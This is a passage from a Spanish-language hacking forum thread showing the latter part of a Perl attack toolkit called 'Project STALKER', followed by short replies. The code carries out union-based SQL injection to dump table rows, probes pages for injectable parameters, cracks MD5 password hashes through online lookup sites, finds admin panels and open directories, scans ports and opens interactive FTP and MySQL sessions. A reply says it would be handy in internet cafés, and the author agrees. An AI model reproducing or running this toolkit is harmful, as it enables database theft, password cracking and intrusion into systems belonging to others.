  672. $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$_[1],char(69,82,84,79,82,56,53,52),$_[2],char(69,82,84,79,82,56,53,52))))";
  673. if ($val_code=~/ERTOR854(.*)ERTOR854/ig) {
  674. $tota = $1;
  675. print "[+] Table : $_[3]\n";
  676. print "[+] Length of the rows : $tota\n\n";
  677. print "[$_[1]] [$_[2]]\n\n";
  678. savefile($_[5].".txt","[Table] : $_[3]");
  679. savefile($_[5].".txt","[+] Length of the rows: $tota\n");
  680. savefile($_[5].".txt","[$_[1]] [$_[2]]\n");
  681. for my $limit(0..$tota) {
  682. chomp $limit;
  683. $injection = toma($start.$concat.$end.$pass1."from".$pass1.$_[3].$pass1."limit".$pass1.$limit.",1".$pass2);
  684. if ($injection=~/ERTOR854(.*)ERTOR854(.*)ERTOR854/ig) {
  685. savefile($_[5].".txt","[$_[1]] : $1   [$_[2]] : $2");
  686. print "[$_[1]] : $1   [$_[2]] : $2\n";
  687. } else {
  688. print "\n\n[+] Extracting Finish\n\n";
  689. &reload;
  690. }
  691. }
  692. } else {
  693. print "[-] Not Found any DATA\n\n";
  694. }}}
  695.  
  696. sub bypass {
  697. if ($_[0] eq "/*") { return ("/**/","/*"); }
  698. elsif ($_[0] eq "%20") { return ("%20","%00"); }
  699. else {return ("+","--");}}
  700.  
  701. sub ascii {
  702. return join ',',unpack "U*",$_[0];
  703. }
  704.  
  705. sub base {
  706. $re = encode_base64($_[0]);
  707. chomp $re;
  708. return $re;
  709. }
  710.  
  711. sub base_de {
  712. $re = decode_base64($_[0]);
  713. chomp $re;
  714. return $re;
  715. }
  716.  
  717.  
  718. sub download {
  719. if ($nave->mirror($_[0],$_[1])) {
  720. if (-f $_[1]) {
  721. return true;
  722. }}}
  723.  
  724.  
  725. sub hex_en {
  726. my $string = $_[0];
  727. $hex = '0x';
  728. for (split //,$string) {
  729. $hex .= sprintf "%x", ord;
  730. }
  731. return $hex;
  732. }
  733.  
  734. sub hex_de {
  735. my $text = shift;
  736. $text =~ s/^0x//;
  737. $encode = join q[], map { chr hex } $text =~ /../g;
  738. return $encode;
  739. }
  740.  
  741. sub ascii_de {
  742. my $text = shift;
  743. $text = join q[], map { chr } split q[,],$text;
  744. return $text;
  745. }
  746.  
  747. sub getprocess {
  748.  
  749. my %procesos;
  750.  
  751. my $uno = Win32::OLE->new("WbemScripting.SWbemLocator");
  752. my $dos = $uno->ConnectServer("","root\\cimv2");
  753.  
  754. foreach my $pro (in $dos->InstancesOf("Win32_Process")){
  755. $procesos{$pro->{Caption}} = $pro->{ProcessId};
  756. }
  757. return %procesos;
  758. }
  759.  
  760. sub killprocess {
  761.  
  762. my ($numb,$pid) = @_;
  763.  
  764. if (Win32::Process::KillProcess($pid,$numb)) {
  765. return true;
  766. } else {
  767. return false;
  768. }
  769. }
  770.  
  771. sub getip {
  772. my $get = gethostbyname($_[0]);
  773. return inet_ntoa($get);
  774. }
  775.  
  776. sub crackit {
  777.  
  778. my $secret = $_[0];
  779.  
  780. print "[+] Cracking $_[0]\n\n";
  781.  
  782. my %hash = (
  783.  
  784. 'http://passcracking.com/' => {
  785. 'tipo'  => 'post',
  786. 'variables'=>'{"datafromuser" => $_[0], "submit" => "DoIT"}',
  787. 'regex'=>'<\/td><td>md5 Database<\/td><td>$_[0]<\/td><td bgcolor=#FF0000>(.*)<\/td><td>',
  788. },  
  789. 'http://md5.hashcracking.com/search.php?md5=' =>  {
  790. 'tipo' => 'get',
  791. 'regex' => 'Cleartext of $_[0] is (.*)',
  792. },
  793. 'http://www.bigtrapeze.com/md5/' =>  {
  794. 'tipo' => 'post',
  795. 'variables'=>'{"query" => $_[0], "submit" => " Crack "}',
  796. 'regex' => 'The hash <strong>$_[0]<\/strong> has been deciphered to: <strong>(.+)<\/strong>',
  797. },
  798. 'http://opencrack.hashkiller.com/' =>  {
  799. 'tipo' => 'post',
  800. 'variables'=>'{"oc_check_md5" => $_[0], "submit" => "Search MD5"}',
  801. 'regex' => qq(<\/div><div class="result">$_[0]:(.+)<br\/>),
  802. },
  803. 'http://www.hashchecker.com/index.php?_sls=search_hash' =>  {
  804. 'tipo' => 'post',
  805. 'variables'=>'{"search_field" => $_[0], "Submit" => "search"}',
  806. 'regex' => '<td><li>Your md5 hash is :<br><li>$_[0] is <b>(.*)<\/b> used charl',
  807. },
  808. 'http://victorov.su/md5/?md5e=&md5d=' =>  {
  809. 'tipo' => 'get',
  810. 'regex' => qq(MD5 ðàñøèôðîâàí: <b>(.*)<\/b><br><form action=\"\">),
  811. }
  812. );
  813.  
  814. for my $data(keys %hash) {
  815.  
  816. if ($hash{$data}{tipo} eq "get") {
  817. $code = toma($data.$_[0]);
  818. if ($code=~/$hash{$data}{regex}/ig) {
  819. print "\n[+] Decoded : ".$1."\n\n";
  820. saveyes("logs/pass-found.txt",$secret.":".$1);
  821. }
  822. } else {
  823. $code = tomar($data,$hash{$data}{variables});
  824. if ($code=~/$hash{$data}{regex}/ig) {
  825. saveyes("logs/pass-found.txt",$secret.":".$1);
  826. }
  827. }
  828. }
  829. print "\n[+] Finish\n";
  830. }
  831.  
  832. sub ftp {
  833.  
  834. my ($ftp,$user,$pass) = @_;
  835.  
  836. if (my $socket = Net::FTP->new($ftp)) {
  837. if ($socket->login($user,$pass)) {
  838.  
  839. print "\n[+] Enter of the server FTP\n\n";
  840.  
  841. menu:
  842.  
  843. print "\n\nftp>";
  844. chomp (my $cmd = <stdin>);
  845. print "\n\n";
  846.  
  847. if ($cmd=~/help/) {
  848. print q(
  849.  
  850. help : show information
  851. cd : change directory <dir>
  852. dir : list a directory
  853. mdkdir : create a directory <dir>
  854. rmdir : delete a directory <dir>
  855. pwd : directory  
  856. del : delete a file <file>
  857. rename : change name of the a file <file1> <file2>
  858. size : size of the a file <file>
  859. put : upload a file <file>
  860. get : download a file <file>
  861. cdup : change dir <dir>
  862. exit : ??
  863.  
  864.  
  865. );
  866. }
  867.  
  868. if ($cmd=~/dir/ig) {
  869. if (my @files = $socket->dir()) {
  870. for(@files) {
  871. print "[+] ".$_."\n";
  872. }
  873. } else {
  874. print "\n\n[-] Error\n\n";
  875. }
  876. }
  877.  
  878. if ($cmd=~/pwd/ig) {
  879. print "[+] Path : ".$socket->pwd()."\n";
  880. }
  881.  
  882. if ($cmd=~/cd (.*)/ig) {
  883. if ($socket->cwd($1)) {
  884. print "[+] Directory changed\n";
  885. } else {
  886. print "\n\n[-] Error\n\n";
  887. }
  888. }
  889.  
  890. if ($cmd=~/cdup/ig) {
  891. if (my $dir = $socket->cdup()) {
  892. print "\n\n[+] Directory changed\n\n";
  893. } else {
  894. print "\n\n[-] Error\n\n";
  895. }
  896. }
  897.  
  898. if ($cmd=~/del (.*)/ig) {
  899. if ($socket->delete($1)) {
  900. print "[+] File deleted\n";
  901. } else {
  902. print "\n\n[-] Error\n\n";
  903. }
  904. }
  905.  
  906. if ($cmd=~/rename (.*) (.*)/ig) {
  907. if ($socket->rename($1,$2)) {
  908. print "[+] File Updated\n";
  909. } else {
  910. print "\n\n[-] Error\n\n";
  911. }
  912. }
  913.  
  914. if ($cmd=~/mkdir (.*)/ig) {
  915. if ($socket->mkdir($1)) {
  916. print "\n\n[+] Directory created\n";
  917. } else {
  918. print "\n\n[-] Error\n\n";
  919. }
  920. }
  921.  
  922. if ($cmd=~/rmdir (.*)/ig) {
  923. if ($socket->rmdir($1)) {
  924. print "\n\n[+] Directory deleted\n";
  925. } else {
  926. print "\n\n[-] Error\n\n";
  927. }
  928. }
  929.  
  930. if ($cmd=~/exit/ig) {
  931. next;
  932. }
  933.  
  934. if ($cmd=~/get (.*) (.*)/ig) {
  935. print "\n\n[+] Downloading file\n\n";
  936. if ($socket->get($1,$2)) {
  937. print "[+] Download completed";
  938. } else {
  939. print "\n\n[-] Error\n\n";
  940. }
  941. }
  942.  
  943. if ($cmd=~/put (.*) (.*)/ig) {
  944. print "\n\n[+] Uploading file\n\n";
  945. if ($socket->put($1,$2)) {
  946. print "[+] Upload completed";
  947. } else {
  948. print "\n\n[-] Error\n\n";
  949. }
  950. }
  951.  
  952. if ($cmd=~/quit/) {
  953. next;
  954. }
  955.  
  956. goto menu;
  957.  
  958. } else {
  959. print "\n[-] Failed the login\n\n";
  960. }
  961.  
  962. } else {
  963. print "\n\n[-] Error\n\n";
  964. }
  965.  
  966.  
  967.  
  968. }
  969.  
  970.  
  971. sub scanpaths {
  972.  
  973. my $urla = $_[0];
  974.  
  975. print "\n[+] Find paths in $urla\n\n\n";
  976. my @urls = repes(get_links(toma($urla)));
  977. for $url(@urls) {
  978. my $web = $url;
  979. my ($scheme, $auth, $path, $query, $frag)  = uri_split($url);
  980. if ($_[0] =~/$auth/ or $auth eq "") {
  981. if ($path=~/(.*)\/(.*)\.(.*)$/) {
  982. my $borrar = $2.".".$3;
  983. if ($web=~/(.*)$borrar/) {
  984. my $co = $1;
  985. unless ($co=~/$auth/) {
  986. $co = $urla.$co;
  987. }
  988. $code = toma($co);
  989. if ($code=~/Index Of/ig) {
  990. print "[Link] : ".$co."\n";
  991. saveyes("logs/paths-found.txt",$co);
  992. }}}}}
  993. print "\n\n[+] Finish\n";
  994. }
  995.  
  996.  
  997. sub scanport {
  998.  
  999. my %ports = ("21"=>"ftp",
  1000. "22"=>"ssh",
  1001. "25"=>"smtp",
  1002. "80"=>"http",
  1003. "110"=>"pop3",
  1004. "3306"=>"mysql"
  1005. );
  1006.  
  1007.  
  1008. print "[+] Scanning $_[0]\n\n\n";
  1009.  
  1010. for my $port(keys %ports) {
  1011.  
  1012. if (new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $port,Proto => "tcp",Timeout  => 0.5)) {
  1013. print "[Port] : ".$port." [Service] : ".$ports{$port}."\n";
  1014. }
  1015. }
  1016. print "\n\n[+] Finish\n";
  1017. }
  1018.  
  1019.  
  1020. sub scanpanel {
  1021. print "[+] Scanning $_[0]\n\n\n";
  1022. for $path(@panels) {
  1023. $code = tomax($_[0]."/".$path);
  1024. if ($code->is_success) {
  1025. print "[Link] : ".$_[0]."/".$path."\n";
  1026. saveyes("logs/panel-logs.txt",$_[0]."/".$path);
  1027. }
  1028. }
  1029. print "\n\n[+] Finish\n";
  1030. }
  1031.  
  1032. sub google {
  1033. my($a,$b) = @_;
  1034. for ($pages=10;$pages<=$b;$pages=$pages+10) {
  1035. $code = toma("http://www.google.com.ar/search?hl=&q=".$a."&start=$pages");
  1036. my @links = get_links($code);
  1037. for my $l(@links) {
  1038. if ($l =~/webcache.googleusercontent.com/) {
  1039. push(@url,$l);
  1040. }
  1041. }
  1042. }
  1043.  
  1044. for(@url) {
  1045. if ($_ =~/cache:(.*?):(.*?)\+/) {
  1046. push(@founds,$2);
  1047. }
  1048. }
  1049.  
  1050. my @founds = repes(@founds);
  1051.  
  1052. return @founds;
  1053. }
  1054.  
  1055.  
  1056. sub sql {
  1057.  
  1058. my ($pass1,$pass2) = ("+","--");
  1059. my $page = shift;
  1060. $code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
  1061. if ($code1=~/The used SELECT statements have a different number of columns/ig) {
  1062. print "[+] SQLI : $page\a\n";
  1063. saveyes("logs/sql-logs.txt",$page);
  1064. }}
  1065.  
  1066. sub get_links {
  1067.  
  1068. my $test = HTML::LinkExtor->new(\&agarrar)->parse($_[0]);
  1069. return @links;
  1070.  
  1071. sub agarrar {
  1072. my ($a,%b) = @_;
  1073. push(@links,values %b);
  1074. }
  1075.  
  1076. }
  1077.  
  1078. sub repes {
  1079. foreach $test(@_) {
  1080. push @limpio,$test unless $repe{$test}++;
  1081. }
  1082. return @limpio;
  1083. }
  1084.  
  1085. sub head {
  1086. cprint "\x0311"; #13
  1087. print "\n\n-- == Project STALKER == --\n\n";
  1088. cprint "\x030";
  1089. }
  1090.  
  1091. sub copyright {
  1092. cprint "\x0311"; #13
  1093. print"\n\n(C) Doddy Hackman 2011\n\n";
  1094. cprint "\x030";
  1095. }
  1096.  
  1097. sub toma {
  1098. return $nave->get($_[0])->content;
  1099. }
  1100.  
  1101. sub tomax {
  1102. return $nave->get($_[0]);
  1103. }
  1104.  
  1105. sub tomar {
  1106. my ($web,$var) = @_;
  1107. return $nave->post($web,[%{$var}])->content;
  1108. }
  1109.  
  1110.  
  1111. sub conectar {
  1112.  
  1113. my $sockex = new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $_[1],
  1114. Proto => "tcp",Timeout  => 5);
  1115.  
  1116. print $sockex $_[2]."\r\n";
  1117. $sockex->read($re,5000);
  1118. $sockex->close;
  1119. return $re."\r\n";
  1120. }
  1121.  
  1122.  
  1123. sub enter {
  1124.  
  1125. my ($host,$user,$pass) = @_;
  1126.  
  1127. print "[+] Connecting to the server\n";
  1128.  
  1129. $info = "dbi:mysql::".$host.":3306";
  1130. if (my $enter = DBI->connect($info,$user,$pass,{PrintError=>0})) {
  1131.  
  1132. print "\n[+] Enter in the database";
  1133.  
  1134. while(1) {
  1135. print "\n\n\n[+] Query : ";
  1136. chomp(my $ac = <stdin>);
  1137.  
  1138. if ($ac eq "exit") {
  1139. $enter->disconnect;
  1140. print "\n\n[+] Closing connection\n\n";
  1141. last;
  1142. }
  1143.  
  1144. $re = $enter->prepare($ac);
  1145. $re->execute();
  1146. my $total = $re->rows();
  1147.  
  1148. my @columnas = @{$re->{NAME}};
  1149.  
  1150. if ($total eq "-1") {
  1151. print "\n\n[-] Query Error\n";
  1152. next;
  1153. } else {
  1154. print "\n\n[+] Result of the query\n";
  1155. if ($total eq 0) {
  1156. print "\n\n[+] Not rows returned\n\n";
  1157. } else {
  1158. print "\n\n[+] Rows returned : ".$total."\n\n\n";
  1159. for(@columnas) {
  1160. print $_."\t\t";
  1161. }
  1162. print "\n\n";
  1163. while (@row = $re->fetchrow_array) {
  1164. for(@row) {
  1165. print $_."\t\t";
  1166. }
  1167. print "\n";
  1168. }}}}
  1169. } else {
  1170. print "\n[-] Error connecting\n";
  1171. }}
  1172.  
  1173. sub saveyes {
  1174. open (SAVE,">>".$_[0]);
  1175. print SAVE $_[1]."\n";
  1176. close SAVE;
  1177. }
  1178.  
  1179. sub savefile {
  1180. open (SAVE,">>logs/webs/".$_[0]);
  1181. print SAVE $_[1]."\n";
  1182. close SAVE;
  1183. }
  1184.  
  1185. sub coleccionar {
  1186. opendir DIR,$_[0];
  1187. my @archivos = readdir DIR;
  1188. close DIR;
  1189. return @archivos;
  1190. }
  1191.  
  1192. sub helpme {
  1193.  
  1194. cprint "\x0310"; #13
  1195. print qq(
  1196.  
  1197. Commands :
  1198.  
  1199.  
  1200. getinfo
  1201. getip <host>
  1202. getlink <page>
  1203. getprocess
  1204. killprocess <name process> <pid process>
  1205. conec <host> <port> <command>  
  1206. allow <host>
  1207. paths <page>
  1208. encodehex <text>
  1209. decodehex <text>
  1210. encodeascii <text>
  1211. decodeascii <text>
  1212. encodebase <text>
  1213. decodebase <text>
  1214. scanport <host>
  1215. panel <page>
  1216. getpass <hash>
  1217. kobra <page>
  1218. ftp <host> <user> <pass>
  1219. mysql <host> <user> <pass>
  1220. navegator
  1221. scangoogle
  1222. help
  1223. exit
  1224.  
  1225. );
  1226. cprint "\x030";
  1227. }
  1228.  
  1229. #
  1230. #  The End ?
  1231. #
  1232.  


« Última modificación: 8 Octubre 2011, 19:09 pm por Doddy » En línea

h3ct0r

Desconectado Desconectado

Mensajes: 108


Hail to the king baby!


Ver Perfil
Re: [Perl] Stalker By Doddy H
« Respuesta #1 en: 18 Octubre 2011, 17:05 pm »

Se ve interesante este proyecto!, que te motivo a hacerlo? piensas en añadirle mas funcionalidades? Podría ser muy útil en ciberCafes... jeje ::)


En línea

[img[/img]
BigBear


Desconectado Desconectado

Mensajes: 545



Ver Perfil
Re: [Perl] Stalker By Doddy H
« Respuesta #2 en: 19 Octubre 2011, 22:47 pm »

diste en el blanco, esa es la idea de este proyecto xDDD
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[Perl] Pass Cracker By Doddy H
Scripting
BigBear 0 1,602 Último mensaje 8 Octubre 2011, 16:56 pm
por BigBear
[Perl] Paranoic Scan By Doddy H
Scripting
BigBear 0 1,770 Último mensaje 8 Octubre 2011, 16:56 pm
por BigBear
[Perl] Project Stalker 0.5
Scripting
BigBear 0 2,188 Último mensaje 3 Diciembre 2011, 16:33 pm
por BigBear
[Perl] Project STALKER 0.7
Scripting
BigBear 0 1,754 Último mensaje 19 Enero 2012, 20:36 pm
por BigBear
[Perl] Project STALKER 1.0
Scripting
BigBear 0 1,664 Último mensaje 25 Agosto 2012, 16:55 pm
por BigBear
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines